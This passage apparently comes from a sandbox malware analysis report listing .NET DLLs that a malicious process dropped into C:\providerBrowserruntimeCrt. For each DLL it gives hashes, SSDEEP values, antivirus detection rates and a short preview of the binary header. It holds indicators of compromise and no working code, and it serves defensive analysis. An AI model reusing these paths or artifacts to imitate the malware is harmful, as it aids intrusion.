                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):40448
                                                                                  Entropy (8bit):5.7028690200758465
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):50176
                                                                                  Entropy (8bit):5.723168999026349
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):33280
                                                                                  Entropy (8bit):5.634433516692816
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):24576
                                                                                  Entropy (8bit):5.535426842040921
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                  MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                  SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                  SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                  SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):5.645950918301459
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):36352
                                                                                  Entropy (8bit):5.668291349855899
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):24064
                                                                                  Entropy (8bit):5.492504448438552
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                                                  MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                                                  SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                                                  SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                                                  SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 33%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):342528
                                                                                  Entropy (8bit):6.170134230759619
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):34304
                                                                                  Entropy (8bit):5.618776214605176
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):70144
                                                                                  Entropy (8bit):5.909536568846014
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):34816
                                                                                  Entropy (8bit):5.636032516496583
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):89600
                                                                                  Entropy (8bit):5.905167202474779
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                  MD5:06442F43E1001D860C8A19A752F19085
                                                                                  SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                  SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                  SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 16%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):22016
                                                                                  Entropy (8bit):5.41854385721431
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):64000
                                                                                  Entropy (8bit):5.857602289000348
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):34304
                                                                                  Entropy (8bit):5.618776214605176
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):33792
                                                                                  Entropy (8bit):5.541771649974822
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):38400
                                                                                  Entropy (8bit):5.699005826018714
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):40448
                                                                                  Entropy (8bit):5.7028690200758465
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):70144
                                                                                  Entropy (8bit):5.909536568846014
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):342528
                                                                                  Entropy (8bit):6.170134230759619
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 50%
